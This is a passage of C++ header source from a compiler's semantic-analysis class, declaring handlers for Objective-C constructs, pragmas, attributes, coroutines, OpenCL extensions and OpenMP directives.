ArrayRef<ObjCTypeParamList *> TypeParamLists,
unsigned NumElts);
DeclGroupPtrTy
ActOnForwardProtocolDeclaration(SourceLocation AtProtocolLoc,
ArrayRef<IdentifierLocPair> IdentList,
const ParsedAttributesView &attrList);
void FindProtocolDeclaration(bool WarnOnDeclarations, bool ForObjCContainer,
ArrayRef<IdentifierLocPair> ProtocolId,
SmallVectorImpl<Decl *> &Protocols);
void DiagnoseTypeArgsAndProtocols(IdentifierInfo *ProtocolId,
SourceLocation ProtocolLoc,
IdentifierInfo *TypeArgId,
SourceLocation TypeArgLoc,
bool SelectProtocolFirst = false);
/// Given a list of identifiers (and their locations), resolve the
/// names to either Objective-C protocol qualifiers or type
/// arguments, as appropriate.
void actOnObjCTypeArgsOrProtocolQualifiers(
Scope *S,
ParsedType baseType,
SourceLocation lAngleLoc,
ArrayRef<IdentifierInfo *> identifiers,
ArrayRef<SourceLocation> identifierLocs,
SourceLocation rAngleLoc,
SourceLocation &typeArgsLAngleLoc,
SmallVectorImpl<ParsedType> &typeArgs,
SourceLocation &typeArgsRAngleLoc,
SourceLocation &protocolLAngleLoc,
SmallVectorImpl<Decl *> &protocols,
SourceLocation &protocolRAngleLoc,
bool warnOnIncompleteProtocols);
/// Build an Objective-C protocol-qualified 'id' type where no
/// base type was specified.
TypeResult actOnObjCProtocolQualifierType(
SourceLocation lAngleLoc,
ArrayRef<Decl *> protocols,
ArrayRef<SourceLocation> protocolLocs,
SourceLocation rAngleLoc);
/// Build a specialized and/or protocol-qualified Objective-C type.
TypeResult actOnObjCTypeArgsAndProtocolQualifiers(
Scope *S,
SourceLocation Loc,
ParsedType BaseType,
SourceLocation TypeArgsLAngleLoc,
ArrayRef<ParsedType> TypeArgs,
SourceLocation TypeArgsRAngleLoc,
SourceLocation ProtocolLAngleLoc,
ArrayRef<Decl *> Protocols,
ArrayRef<SourceLocation> ProtocolLocs,
SourceLocation ProtocolRAngleLoc);
/// Build an Objective-C type parameter type.
QualType BuildObjCTypeParamType(const ObjCTypeParamDecl *Decl,
SourceLocation ProtocolLAngleLoc,
ArrayRef<ObjCProtocolDecl *> Protocols,
ArrayRef<SourceLocation> ProtocolLocs,
SourceLocation ProtocolRAngleLoc,
bool FailOnError = false);
/// Build an Objective-C object pointer type.
QualType BuildObjCObjectType(QualType BaseType,
SourceLocation Loc,
SourceLocation TypeArgsLAngleLoc,
ArrayRef<TypeSourceInfo *> TypeArgs,
SourceLocation TypeArgsRAngleLoc,
SourceLocation ProtocolLAngleLoc,
ArrayRef<ObjCProtocolDecl *> Protocols,
ArrayRef<SourceLocation> ProtocolLocs,
SourceLocation ProtocolRAngleLoc,
bool FailOnError = false);
/// Ensure attributes are consistent with type.
/// \param [in, out] Attributes The attributes to check; they will
/// be modified to be consistent with \p PropertyPtrTy.
void CheckObjCPropertyAttributes(Decl *PropertyPtrTy,
SourceLocation Loc,
unsigned &Attributes,
bool propertyInPrimaryClass);
/// Process the specified property declaration and create decls for the
/// setters and getters as needed.
/// \param property The property declaration being processed
void ProcessPropertyDecl(ObjCPropertyDecl *property);
void DiagnosePropertyMismatch(ObjCPropertyDecl *Property,
ObjCPropertyDecl *SuperProperty,
const IdentifierInfo *Name,
bool OverridingProtocolProperty);
void DiagnoseClassExtensionDupMethods(ObjCCategoryDecl *CAT,
ObjCInterfaceDecl *ID);
Decl *ActOnAtEnd(Scope *S, SourceRange AtEnd,
ArrayRef<Decl *> allMethods = None,
ArrayRef<DeclGroupPtrTy> allTUVars = None);
Decl *ActOnProperty(Scope *S, SourceLocation AtLoc,
SourceLocation LParenLoc,
FieldDeclarator &FD, ObjCDeclSpec &ODS,
Selector GetterSel, Selector SetterSel,
tok::ObjCKeywordKind MethodImplKind,
DeclContext *lexicalDC = nullptr);
Decl *ActOnPropertyImplDecl(Scope *S,
SourceLocation AtLoc,
SourceLocation PropertyLoc,
bool ImplKind,
IdentifierInfo *PropertyId,
IdentifierInfo *PropertyIvar,
SourceLocation PropertyIvarLoc,
ObjCPropertyQueryKind QueryKind);
enum ObjCSpecialMethodKind {
OSMK_None,
OSMK_Alloc,
OSMK_New,
OSMK_Copy,
OSMK_RetainingInit,
OSMK_NonRetainingInit
};
struct ObjCArgInfo {
IdentifierInfo *Name;
SourceLocation NameLoc;
// The Type is null if no type was specified, and the DeclSpec is invalid
// in this case.
ParsedType Type;
ObjCDeclSpec DeclSpec;
/// ArgAttrs - Attribute list for this argument.
ParsedAttributesView ArgAttrs;
};
Decl *ActOnMethodDeclaration(
Scope *S,
SourceLocation BeginLoc, // location of the + or -.
SourceLocation EndLoc, // location of the ; or {.
tok::TokenKind MethodType, ObjCDeclSpec &ReturnQT, ParsedType ReturnType,
ArrayRef<SourceLocation> SelectorLocs, Selector Sel,
// optional arguments. The number of types/arguments is obtained
// from Sel.getNumArgs().
ObjCArgInfo *ArgInfo, DeclaratorChunk::ParamInfo *CParamInfo,
unsigned CNumArgs, // c-style args
const ParsedAttributesView &AttrList, tok::ObjCKeywordKind MethodImplKind,
bool isVariadic, bool MethodDefinition);
ObjCMethodDecl *LookupMethodInQualifiedType(Selector Sel,
const ObjCObjectPointerType *OPT,
bool IsInstance);
ObjCMethodDecl *LookupMethodInObjectType(Selector Sel, QualType Ty,
bool IsInstance);
bool CheckARCMethodDecl(ObjCMethodDecl *method);
bool inferObjCARCLifetime(ValueDecl *decl);
void deduceOpenCLAddressSpace(ValueDecl *decl);
ExprResult
HandleExprPropertyRefExpr(const ObjCObjectPointerType *OPT,
Expr *BaseExpr,
SourceLocation OpLoc,
DeclarationName MemberName,
SourceLocation MemberLoc,
SourceLocation SuperLoc, QualType SuperType,
bool Super);
ExprResult
ActOnClassPropertyRefExpr(IdentifierInfo &receiverName,
IdentifierInfo &propertyName,
SourceLocation receiverNameLoc,
SourceLocation propertyNameLoc);
ObjCMethodDecl *tryCaptureObjCSelf(SourceLocation Loc);
/// Describes the kind of message expression indicated by a message
/// send that starts with an identifier.
enum ObjCMessageKind {
/// The message is sent to 'super'.
ObjCSuperMessage,
/// The message is an instance message.
ObjCInstanceMessage,
/// The message is a class message, and the identifier is a type
/// name.
ObjCClassMessage
};
ObjCMessageKind getObjCMessageKind(Scope *S,
IdentifierInfo *Name,
SourceLocation NameLoc,
bool IsSuper,
bool HasTrailingDot,
ParsedType &ReceiverType);
ExprResult ActOnSuperMessage(Scope *S, SourceLocation SuperLoc,
Selector Sel,
SourceLocation LBracLoc,
ArrayRef<SourceLocation> SelectorLocs,
SourceLocation RBracLoc,
MultiExprArg Args);
ExprResult BuildClassMessage(TypeSourceInfo *ReceiverTypeInfo,
QualType ReceiverType,
SourceLocation SuperLoc,
Selector Sel,
ObjCMethodDecl *Method,
SourceLocation LBracLoc,
ArrayRef<SourceLocation> SelectorLocs,
SourceLocation RBracLoc,
MultiExprArg Args,
bool isImplicit = false);
ExprResult BuildClassMessageImplicit(QualType ReceiverType,
bool isSuperReceiver,
SourceLocation Loc,
Selector Sel,
ObjCMethodDecl *Method,
MultiExprArg Args);
ExprResult ActOnClassMessage(Scope *S,
ParsedType Receiver,
Selector Sel,
SourceLocation LBracLoc,
ArrayRef<SourceLocation> SelectorLocs,
SourceLocation RBracLoc,
MultiExprArg Args);
ExprResult BuildInstanceMessage(Expr *Receiver,
QualType ReceiverType,
SourceLocation SuperLoc,
Selector Sel,
ObjCMethodDecl *Method,
SourceLocation LBracLoc,
ArrayRef<SourceLocation> SelectorLocs,
SourceLocation RBracLoc,
MultiExprArg Args,
bool isImplicit = false);
ExprResult BuildInstanceMessageImplicit(Expr *Receiver,
QualType ReceiverType,
SourceLocation Loc,
Selector Sel,
ObjCMethodDecl *Method,
MultiExprArg Args);
ExprResult ActOnInstanceMessage(Scope *S,
Expr *Receiver,
Selector Sel,
SourceLocation LBracLoc,
ArrayRef<SourceLocation> SelectorLocs,
SourceLocation RBracLoc,
MultiExprArg Args);
ExprResult BuildObjCBridgedCast(SourceLocation LParenLoc,
ObjCBridgeCastKind Kind,
SourceLocation BridgeKeywordLoc,
TypeSourceInfo *TSInfo,
Expr *SubExpr);
ExprResult ActOnObjCBridgedCast(Scope *S,
SourceLocation LParenLoc,
ObjCBridgeCastKind Kind,
SourceLocation BridgeKeywordLoc,
ParsedType Type,
SourceLocation RParenLoc,
Expr *SubExpr);
void CheckTollFreeBridgeCast(QualType castType, Expr *castExpr);
void CheckObjCBridgeRelatedCast(QualType castType, Expr *castExpr);
bool CheckTollFreeBridgeStaticCast(QualType castType, Expr *castExpr,
CastKind &Kind);
bool checkObjCBridgeRelatedComponents(SourceLocation Loc,
QualType DestType, QualType SrcType,
ObjCInterfaceDecl *&RelatedClass,
ObjCMethodDecl *&ClassMethod,
ObjCMethodDecl *&InstanceMethod,
TypedefNameDecl *&TDNDecl,
bool CfToNs, bool Diagnose = true);
bool CheckObjCBridgeRelatedConversions(SourceLocation Loc,
QualType DestType, QualType SrcType,
Expr *&SrcExpr, bool Diagnose = true);
bool ConversionToObjCStringLiteralCheck(QualType DstType, Expr *&SrcExpr,
bool Diagnose = true);
bool checkInitMethod(ObjCMethodDecl *method, QualType receiverTypeIfCall);
/// Check whether the given new method is a valid override of the
/// given overridden method, and set any properties that should be inherited.
void CheckObjCMethodOverride(ObjCMethodDecl *NewMethod,
const ObjCMethodDecl *Overridden);
/// Describes the compatibility of a result type with its method.
enum ResultTypeCompatibilityKind {
RTC_Compatible,
RTC_Incompatible,
RTC_Unknown
};
/// Check whether the declared result type of the given Objective-C
/// method declaration is compatible with the method's class.
ResultTypeCompatibilityKind
checkRelatedResultTypeCompatibility(const ObjCMethodDecl *Method,
const ObjCInterfaceDecl *CurrentClass);
void CheckObjCMethodDirectOverrides(ObjCMethodDecl *method,
ObjCMethodDecl *overridden);
void CheckObjCMethodOverrides(ObjCMethodDecl *ObjCMethod,
ObjCInterfaceDecl *CurrentClass,
ResultTypeCompatibilityKind RTC);
enum PragmaOptionsAlignKind {
POAK_Native, // #pragma options align=native
POAK_Natural, // #pragma options align=natural
POAK_Packed, // #pragma options align=packed
POAK_Power, // #pragma options align=power
POAK_Mac68k, // #pragma options align=mac68k
POAK_Reset // #pragma options align=reset
};
/// ActOnPragmaClangSection - Called on well formed \#pragma clang section
void ActOnPragmaClangSection(SourceLocation PragmaLoc,
PragmaClangSectionAction Action,
PragmaClangSectionKind SecKind, StringRef SecName);
/// ActOnPragmaOptionsAlign - Called on well formed \#pragma options align.
void ActOnPragmaOptionsAlign(PragmaOptionsAlignKind Kind,
SourceLocation PragmaLoc);
/// ActOnPragmaPack - Called on well formed \#pragma pack(...).
void ActOnPragmaPack(SourceLocation PragmaLoc, PragmaMsStackAction Action,
StringRef SlotLabel, Expr *Alignment);
enum class PragmaPackDiagnoseKind {
NonDefaultStateAtInclude,
ChangedStateAtExit
};
void DiagnoseNonDefaultPragmaPack(PragmaPackDiagnoseKind Kind,
SourceLocation IncludeLoc);
void DiagnoseUnterminatedPragmaPack();
/// ActOnPragmaMSStruct - Called on well formed \#pragma ms_struct [on|off].
void ActOnPragmaMSStruct(PragmaMSStructKind Kind);
/// ActOnPragmaMSComment - Called on well formed
/// \#pragma comment(kind, "arg").
void ActOnPragmaMSComment(SourceLocation CommentLoc, PragmaMSCommentKind Kind,
StringRef Arg);
/// ActOnPragmaMSPointersToMembers - called on well formed \#pragma
/// pointers_to_members(representation method[, general purpose
/// representation]).
void ActOnPragmaMSPointersToMembers(
LangOptions::PragmaMSPointersToMembersKind Kind,
SourceLocation PragmaLoc);
/// Called on well formed \#pragma vtordisp().
void ActOnPragmaMSVtorDisp(PragmaMsStackAction Action,
SourceLocation PragmaLoc,
MSVtorDispMode Value);
enum PragmaSectionKind {
PSK_DataSeg,
PSK_BSSSeg,
PSK_ConstSeg,
PSK_CodeSeg,
};
bool UnifySection(StringRef SectionName,
int SectionFlags,
DeclaratorDecl *TheDecl);
bool UnifySection(StringRef SectionName,
int SectionFlags,
SourceLocation PragmaSectionLocation);
/// Called on well formed \#pragma bss_seg/data_seg/const_seg/code_seg.
void ActOnPragmaMSSeg(SourceLocation PragmaLocation,
PragmaMsStackAction Action,
llvm::StringRef StackSlotLabel,
StringLiteral *SegmentName,
llvm::StringRef PragmaName);
/// Called on well formed \#pragma section().
void ActOnPragmaMSSection(SourceLocation PragmaLocation,
int SectionFlags, StringLiteral *SegmentName);
/// Called on well-formed \#pragma init_seg().
void ActOnPragmaMSInitSeg(SourceLocation PragmaLocation,
StringLiteral *SegmentName);
/// Called on #pragma clang __debug dump II
void ActOnPragmaDump(Scope *S, SourceLocation Loc, IdentifierInfo *II);
/// ActOnPragmaDetectMismatch - Called on well-formed \#pragma detect_mismatch
void ActOnPragmaDetectMismatch(SourceLocation Loc, StringRef Name,
StringRef Value);
/// ActOnPragmaUnused - Called on well-formed '\#pragma unused'.
void ActOnPragmaUnused(const Token &Identifier,
Scope *curScope,
SourceLocation PragmaLoc);
/// ActOnPragmaVisibility - Called on well formed \#pragma GCC visibility... .
void ActOnPragmaVisibility(const IdentifierInfo* VisType,
SourceLocation PragmaLoc);
NamedDecl *DeclClonePragmaWeak(NamedDecl *ND, IdentifierInfo *II,
SourceLocation Loc);
void DeclApplyPragmaWeak(Scope *S, NamedDecl *ND, WeakInfo &W);
/// ActOnPragmaWeakID - Called on well formed \#pragma weak ident.
void ActOnPragmaWeakID(IdentifierInfo* WeakName,
SourceLocation PragmaLoc,
SourceLocation WeakNameLoc);
/// ActOnPragmaRedefineExtname - Called on well formed
/// \#pragma redefine_extname oldname newname.
void ActOnPragmaRedefineExtname(IdentifierInfo* WeakName,
IdentifierInfo* AliasName,
SourceLocation PragmaLoc,
SourceLocation WeakNameLoc,
SourceLocation AliasNameLoc);
/// ActOnPragmaWeakAlias - Called on well formed \#pragma weak ident = ident.
void ActOnPragmaWeakAlias(IdentifierInfo* WeakName,
IdentifierInfo* AliasName,
SourceLocation PragmaLoc,
SourceLocation WeakNameLoc,
SourceLocation AliasNameLoc);
/// ActOnPragmaFPContract - Called on well formed
/// \#pragma {STDC,OPENCL} FP_CONTRACT and
/// \#pragma clang fp contract
void ActOnPragmaFPContract(LangOptions::FPContractModeKind FPC);
/// ActOnPragmaFEnvAccess - Called on well formed
/// \#pragma STDC FENV_ACCESS
void ActOnPragmaFEnvAccess(LangOptions::FEnvAccessModeKind FPC);
/// Called to set rounding mode for floating point operations.
void setRoundingMode(llvm::RoundingMode);
/// Called to set exception behavior for floating point operations.
void setExceptionMode(LangOptions::FPExceptionModeKind);
/// AddAlignmentAttributesForRecord - Adds any needed alignment attributes to
/// the record decl, to handle '\#pragma pack' and '\#pragma options align'.
void AddAlignmentAttributesForRecord(RecordDecl *RD);
/// AddMsStructLayoutForRecord - Adds ms_struct layout attribute to record.
void AddMsStructLayoutForRecord(RecordDecl *RD);
/// FreePackedContext - Deallocate and null out PackContext.
void FreePackedContext();
/// PushNamespaceVisibilityAttr - Note that we've entered a
/// namespace with a visibility attribute.
void PushNamespaceVisibilityAttr(const VisibilityAttr *Attr,
SourceLocation Loc);
/// AddPushedVisibilityAttribute - If '\#pragma GCC visibility' was used,
/// add an appropriate visibility attribute.
void AddPushedVisibilityAttribute(Decl *RD);
/// PopPragmaVisibility - Pop the top element of the visibility stack; used
/// for '\#pragma GCC visibility' and visibility attributes on namespaces.
void PopPragmaVisibility(bool IsNamespaceEnd, SourceLocation EndLoc);
/// FreeVisContext - Deallocate and null out VisContext.
void FreeVisContext();
/// AddCFAuditedAttribute - Check whether we're currently within
/// '\#pragma clang arc_cf_code_audited' and, if so, consider adding
/// the appropriate attribute.
void AddCFAuditedAttribute(Decl *D);
void ActOnPragmaAttributeAttribute(ParsedAttr &Attribute,
SourceLocation PragmaLoc,
attr::ParsedSubjectMatchRuleSet Rules);
void ActOnPragmaAttributeEmptyPush(SourceLocation PragmaLoc,
const IdentifierInfo *Namespace);
/// Called on well-formed '\#pragma clang attribute pop'.
void ActOnPragmaAttributePop(SourceLocation PragmaLoc,
const IdentifierInfo *Namespace);
/// Adds the attributes that have been specified using the
/// '\#pragma clang attribute push' directives to the given declaration.
void AddPragmaAttributes(Scope *S, Decl *D);
void DiagnoseUnterminatedPragmaAttribute();
/// Called on well formed \#pragma clang optimize.
void ActOnPragmaOptimize(bool On, SourceLocation PragmaLoc);
/// Get the location for the currently active "\#pragma clang optimize
/// off". If this location is invalid, then the state of the pragma is "on".
SourceLocation getOptimizeOffPragmaLocation() const {
return OptimizeOffPragmaLocation;
}
/// Only called on function definitions; if there is a pragma in scope
/// with the effect of a range-based optnone, consider marking the function
/// with attribute optnone.
void AddRangeBasedOptnone(FunctionDecl *FD);
/// Adds the 'optnone' attribute to the function declaration if there
/// are no conflicts; Loc represents the location causing the 'optnone'
/// attribute to be added (usually because of a pragma).
void AddOptnoneAttributeIfNoConflicts(FunctionDecl *FD, SourceLocation Loc);
/// AddAlignedAttr - Adds an aligned attribute to a particular declaration.
void AddAlignedAttr(Decl *D, const AttributeCommonInfo &CI, Expr *E,
bool IsPackExpansion);
void AddAlignedAttr(Decl *D, const AttributeCommonInfo &CI, TypeSourceInfo *T,
bool IsPackExpansion);
/// AddAssumeAlignedAttr - Adds an assume_aligned attribute to a particular
/// declaration.
void AddAssumeAlignedAttr(Decl *D, const AttributeCommonInfo &CI, Expr *E,
Expr *OE);
/// AddAllocAlignAttr - Adds an alloc_align attribute to a particular
/// declaration.
void AddAllocAlignAttr(Decl *D, const AttributeCommonInfo &CI,
Expr *ParamExpr);
/// AddAlignValueAttr - Adds an align_value attribute to a particular
/// declaration.
void AddAlignValueAttr(Decl *D, const AttributeCommonInfo &CI, Expr *E);
/// AddLaunchBoundsAttr - Adds a launch_bounds attribute to a particular
/// declaration.
void AddLaunchBoundsAttr(Decl *D, const AttributeCommonInfo &CI,
Expr *MaxThreads, Expr *MinBlocks);
/// AddModeAttr - Adds a mode attribute to a particular declaration.
void AddModeAttr(Decl *D, const AttributeCommonInfo &CI, IdentifierInfo *Name,
bool InInstantiation = false);
void AddParameterABIAttr(Decl *D, const AttributeCommonInfo &CI,
ParameterABI ABI);
enum class RetainOwnershipKind {NS, CF, OS};
void AddXConsumedAttr(Decl *D, const AttributeCommonInfo &CI,
RetainOwnershipKind K, bool IsTemplateInstantiation);
/// addAMDGPUFlatWorkGroupSizeAttr - Adds an amdgpu_flat_work_group_size
/// attribute to a particular declaration.
void addAMDGPUFlatWorkGroupSizeAttr(Decl *D, const AttributeCommonInfo &CI,
Expr *Min, Expr *Max);
/// addAMDGPUWavesPerEUAttr - Adds an amdgpu_waves_per_eu attribute to a
/// particular declaration.
void addAMDGPUWavesPerEUAttr(Decl *D, const AttributeCommonInfo &CI,
Expr *Min, Expr *Max);
bool checkNSReturnsRetainedReturnType(SourceLocation loc, QualType type);
//===--------------------------------------------------------------------===//
// C++ Coroutines TS
//
bool ActOnCoroutineBodyStart(Scope *S, SourceLocation KwLoc,
StringRef Keyword);
ExprResult ActOnCoawaitExpr(Scope *S, SourceLocation KwLoc, Expr *E);
ExprResult ActOnCoyieldExpr(Scope *S, SourceLocation KwLoc, Expr *E);
StmtResult ActOnCoreturnStmt(Scope *S, SourceLocation KwLoc, Expr *E);
ExprResult BuildResolvedCoawaitExpr(SourceLocation KwLoc, Expr *E,
bool IsImplicit = false);
ExprResult BuildUnresolvedCoawaitExpr(SourceLocation KwLoc, Expr *E,
UnresolvedLookupExpr* Lookup);
ExprResult BuildCoyieldExpr(SourceLocation KwLoc, Expr *E);
StmtResult BuildCoreturnStmt(SourceLocation KwLoc, Expr *E,
bool IsImplicit = false);
StmtResult BuildCoroutineBodyStmt(CoroutineBodyStmt::CtorArgs);
bool buildCoroutineParameterMoves(SourceLocation Loc);
VarDecl *buildCoroutinePromise(SourceLocation Loc);
void CheckCompletedCoroutineBody(FunctionDecl *FD, Stmt *&Body);
ClassTemplateDecl *lookupCoroutineTraits(SourceLocation KwLoc,
SourceLocation FuncLoc);
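// Illustrative C++20 sketch (not from this header): 'task' stands for a
// hypothetical coroutine return type providing the required promise_type;
// each keyword maps to one of the ActOn* entry points above.
//
//   task<int> f() {
//     int v = co_await g();  // ActOnCoawaitExpr
//     co_yield v;            // ActOnCoyieldExpr
//     co_return v;           // ActOnCoreturnStmt
//   }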
//===--------------------------------------------------------------------===//
// OpenCL extensions.
//
private:
std::string CurrOpenCLExtension;
/// Extensions required by an OpenCL type.
llvm::DenseMap<const Type*, std::set<std::string>> OpenCLTypeExtMap;
/// Extensions required by an OpenCL declaration.
llvm::DenseMap<const Decl*, std::set<std::string>> OpenCLDeclExtMap;
public:
llvm::StringRef getCurrentOpenCLExtension() const {
return CurrOpenCLExtension;
}
/// Check if a function declaration \p FD is associated with any
/// extensions present in OpenCLDeclExtMap and, if so, return the
/// extension(s) name(s).
std::string getOpenCLExtensionsFromDeclExtMap(FunctionDecl *FD);
/// Check if a function type \p FT is associated with any
/// extensions present in OpenCLTypeExtMap and, if so, return the
/// extension(s) name(s).
std::string getOpenCLExtensionsFromTypeExtMap(FunctionType *FT);
/// Find an extension in an appropriate extension map and return its name.
template<typename T, typename MapT>
std::string getOpenCLExtensionsFromExtMap(T* FT, MapT &Map);
void setCurrentOpenCLExtension(llvm::StringRef Ext) {
CurrOpenCLExtension = std::string(Ext);
}
/// Set OpenCL extensions for a type which can only be used when these
/// OpenCL extensions are enabled. If \p Exts is empty, do nothing.
/// \param Exts A space separated list of OpenCL extensions.
void setOpenCLExtensionForType(QualType T, llvm::StringRef Exts);
/// Set OpenCL extensions for a declaration which can only be
/// used when these OpenCL extensions are enabled. If \p Exts is empty, do
/// nothing.
/// \param Exts A space separated list of OpenCL extensions.
void setOpenCLExtensionForDecl(Decl *FD, llvm::StringRef Exts);
/// Set current OpenCL extensions for a type which can only be used
/// when these OpenCL extensions are enabled. If current OpenCL extension is
/// empty, do nothing.
void setCurrentOpenCLExtensionForType(QualType T);
/// Set current OpenCL extensions for a declaration which
/// can only be used when these OpenCL extensions are enabled. If current
/// OpenCL extension is empty, do nothing.
void setCurrentOpenCLExtensionForDecl(Decl *FD);
bool isOpenCLDisabledDecl(Decl *FD);
/// Check if type \p T corresponding to declaration specifier \p DS
/// is disabled due to required OpenCL extensions being disabled. If so,
/// emit diagnostics.
/// \return true if type is disabled.
bool checkOpenCLDisabledTypeDeclSpec(const DeclSpec &DS, QualType T);
/// Check if declaration \p D used by expression \p E
/// is disabled due to required OpenCL extensions being disabled. If so,
/// emit diagnostics.
/// \return true if type is disabled.
bool checkOpenCLDisabledDecl(const NamedDecl &D, const Expr &E);
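// Illustrative OpenCL sketch (not from this header): the extension pragma
// that drives setCurrentOpenCLExtension and the type/decl extension maps.
// Using 'double' while cl_khr_fp64 is disabled is the situation the
// checkOpenCLDisabled* helpers diagnose.
//
//   #pragma OPENCL EXTENSION cl_khr_fp64 : enable
//   double square(double x) { return x * x; }
//   #pragma OPENCL EXTENSION cl_khr_fp64 : disable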
//===--------------------------------------------------------------------===//
// OpenMP directives and clauses.
//
private:
void *VarDataSharingAttributesStack;
/// Number of nested '#pragma omp declare target' directives.
unsigned DeclareTargetNestingLevel = 0;
/// Initialization of data-sharing attributes stack.
void InitDataSharingAttributesStack();
void DestroyDataSharingAttributesStack();
ExprResult
VerifyPositiveIntegerConstantInClause(Expr *Op, OpenMPClauseKind CKind,
bool StrictlyPositive = true);
/// Returns OpenMP nesting level for current directive.
unsigned getOpenMPNestingLevel() const;
/// Adjusts the function scopes index for the target-based regions.
void adjustOpenMPTargetScopeIndex(unsigned &FunctionScopesIndex,
unsigned Level) const;
/// Returns the number of scopes associated with the construct on the given
/// OpenMP level.
int getNumberOfConstructScopes(unsigned Level) const;
/// Push new OpenMP function region for non-capturing function.
void pushOpenMPFunctionRegion();
/// Pop OpenMP function region for non-capturing function.
void popOpenMPFunctionRegion(const sema::FunctionScopeInfo *OldFSI);
/// Check if the expression is allowed to be used in expressions for the
/// OpenMP devices.
void checkOpenMPDeviceExpr(const Expr *E);
/// Checks if a type or a declaration is disabled due to the owning extension
/// being disabled, and emits diagnostic messages if it is disabled.
/// \param D type or declaration to be checked.
/// \param DiagLoc source location for the diagnostic message.
/// \param DiagInfo information to be emitted for the diagnostic message.
/// \param SrcRange source range of the declaration.
/// \param Map maps type or declaration to the extensions.
/// \param Selector selects diagnostic message: 0 for type and 1 for
/// declaration.
/// \return true if the type or declaration is disabled.
template <typename T, typename DiagLocT, typename DiagInfoT, typename MapT>
bool checkOpenCLDisabledTypeOrDecl(T D, DiagLocT DiagLoc, DiagInfoT DiagInfo,
MapT &Map, unsigned Selector = 0,
SourceRange SrcRange = SourceRange());
/// Helper to keep information about the current `omp begin/end declare
/// variant` nesting.
struct OMPDeclareVariantScope {
/// The associated OpenMP context selector.
OMPTraitInfo *TI;
/// The associated OpenMP context selector mangling.
std::string NameSuffix;
OMPDeclareVariantScope(OMPTraitInfo &TI);
};
/// The current `omp begin/end declare variant` scopes.
SmallVector<OMPDeclareVariantScope, 4> OMPDeclareVariantScopes;
/// The declarator \p D defines a function in the scope \p S which is nested
/// in an `omp begin/end declare variant` scope. In this method we create a
/// declaration for \p D and rename \p D according to the OpenMP context
/// selector of the surrounding scope.
FunctionDecl *
ActOnStartOfFunctionDefinitionInOpenMPDeclareVariantScope(Scope *S,
Declarator &D);
/// Register \p FD as a specialization of \p BaseFD in the current `omp
/// begin/end declare variant` scope.
void ActOnFinishedFunctionDefinitionInOpenMPDeclareVariantScope(
FunctionDecl *FD, FunctionDecl *BaseFD);
public:
/// Return true if we are currently inside an `omp begin/end declare
/// variant` scope.
bool isInOpenMPDeclareVariantScope() {
return !OMPDeclareVariantScopes.empty();
}
/// Given the potential call expression \p Call, determine if a
/// specialization via the OpenMP declare variant mechanism is available. If
/// there is, return the specialized call expression, otherwise return the
/// original \p Call.
ExprResult ActOnOpenMPCall(ExprResult Call, Scope *Scope,
SourceLocation LParenLoc, MultiExprArg ArgExprs,
SourceLocation RParenLoc, Expr *ExecConfig);
/// Handle a `omp begin declare variant`.
void ActOnOpenMPBeginDeclareVariant(SourceLocation Loc, OMPTraitInfo &TI);
/// Handle a `omp end declare variant`.
void ActOnOpenMPEndDeclareVariant();
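// Illustrative OpenMP sketch (not from this header): the directive pair
// handled by ActOnOpenMPBeginDeclareVariant/ActOnOpenMPEndDeclareVariant;
// the x86_64 selector is an example context.
//
//   #pragma omp begin declare variant match(device = {arch(x86_64)})
//   void compute();   // renamed/specialized for the x86_64 context
//   #pragma omp end declare variant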
/// Checks if the variant/multiversion functions are compatible.
bool areMultiversionVariantFunctionsCompatible(
const FunctionDecl *OldFD, const FunctionDecl *NewFD,
const PartialDiagnostic &NoProtoDiagID,
const PartialDiagnosticAt &NoteCausedDiagIDAt,
const PartialDiagnosticAt &NoSupportDiagIDAt,
const PartialDiagnosticAt &DiffDiagIDAt, bool TemplatesSupported,
bool ConstexprSupported, bool CLinkageMayDiffer);
/// Tries to capture a lambda's captured variables in the OpenMP region
/// before the lambda itself is captured.
void tryCaptureOpenMPLambdas(ValueDecl *V);
/// Return true if the provided declaration \a D should be captured by
/// reference.
/// \param Level Relative level of nested OpenMP construct for that the check
/// is performed.
/// \param OpenMPCaptureLevel Capture level within an OpenMP construct.
bool isOpenMPCapturedByRef(const ValueDecl *D, unsigned Level,
unsigned OpenMPCaptureLevel) const;
/// Check if the specified variable is used in one of the private
/// clauses (private, firstprivate, lastprivate, reduction etc.) in OpenMP
/// constructs.
VarDecl *isOpenMPCapturedDecl(ValueDecl *D, bool CheckScopeInfo = false,
unsigned StopAt = 0);
ExprResult getOpenMPCapturedExpr(VarDecl *Capture, ExprValueKind VK,
ExprObjectKind OK, SourceLocation Loc);
/// If the current region is a loop-based region, mark the start of the loop
/// construct.
void startOpenMPLoop();
/// If the current region is a range loop-based region, mark the start of the
/// loop construct.
void startOpenMPCXXRangeFor();
/// Check if the specified variable is used in 'private' clause.
/// \param Level Relative level of nested OpenMP construct for that the check
/// is performed.
OpenMPClauseKind isOpenMPPrivateDecl(ValueDecl *D, unsigned Level,
unsigned CapLevel) const;
/// Sets OpenMP capture kind (OMPC_private, OMPC_firstprivate, OMPC_map etc.)
/// for \p FD based on DSA for the provided corresponding captured declaration
/// \p D.
void setOpenMPCaptureKind(FieldDecl *FD, const ValueDecl *D, unsigned Level);
/// Check if the specified variable is captured by 'target' directive.
/// \param Level Relative level of nested OpenMP construct for that the check
/// is performed.
bool isOpenMPTargetCapturedDecl(const ValueDecl *D, unsigned Level,
unsigned CaptureLevel) const;
/// Check if the specified global variable must be captured by outer capture
/// regions.
/// \param Level Relative level of nested OpenMP construct for that
/// the check is performed.
bool isOpenMPGlobalCapturedDecl(ValueDecl *D, unsigned Level,
unsigned CaptureLevel) const;
ExprResult PerformOpenMPImplicitIntegerConversion(SourceLocation OpLoc,
Expr *Op);
/// Called on start of new data sharing attribute block.
void StartOpenMPDSABlock(OpenMPDirectiveKind K,
const DeclarationNameInfo &DirName, Scope *CurScope,
SourceLocation Loc);
/// Start analysis of clauses.
void StartOpenMPClause(OpenMPClauseKind K);
/// End analysis of clauses.
void EndOpenMPClause();
/// Called on end of data sharing attribute block.
void EndOpenMPDSABlock(Stmt *CurDirective);
/// Check if the current region is an OpenMP loop region and if it is,
/// mark loop control variable, used in \p Init for loop initialization, as
/// private by default.
/// \param Init First part of the for loop.
void ActOnOpenMPLoopInitialization(SourceLocation ForLoc, Stmt *Init);
/// Called on correct id-expression from the '#pragma omp
/// threadprivate'.
ExprResult ActOnOpenMPIdExpression(Scope *CurScope, CXXScopeSpec &ScopeSpec,
const DeclarationNameInfo &Id,
OpenMPDirectiveKind Kind);
/// Called on well-formed '#pragma omp threadprivate'.
DeclGroupPtrTy ActOnOpenMPThreadprivateDirective(
SourceLocation Loc,
